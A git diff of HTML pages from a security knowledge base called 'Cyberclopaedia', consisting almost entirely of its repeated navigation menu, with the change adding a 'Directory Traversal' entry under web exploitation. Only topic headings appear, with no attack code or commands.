        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Exploitation/Web/SQL Injection/Introduction.html b/docs/Exploitation/Web/SQL Injection/Introduction.html index c54cc560..4f4f02a6 100644 --- a/docs/Exploitation/Web/SQL Injection/Introduction.html +++ b/docs/Exploitation/Web/SQL Injection/Introduction.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -208,22 +208,6 @@

Types of SQLi - - diff --git a/docs/Exploitation/Web/SQL Injection/Union injections.html b/docs/Exploitation/Web/SQL Injection/Union injections.html index f8a70d21..9ddce9a9 100644 --- a/docs/Exploitation/Web/SQL Injection/Union injections.html +++ b/docs/Exploitation/Web/SQL Injection/Union injections.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -200,22 +200,6 @@

- - diff --git a/docs/Exploitation/Web/SQL Injection/index.html b/docs/Exploitation/Web/SQL Injection/index.html index 18a7ce0e..08ea9aa6 100644 --- a/docs/Exploitation/Web/SQL Injection/index.html +++ b/docs/Exploitation/Web/SQL Injection/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
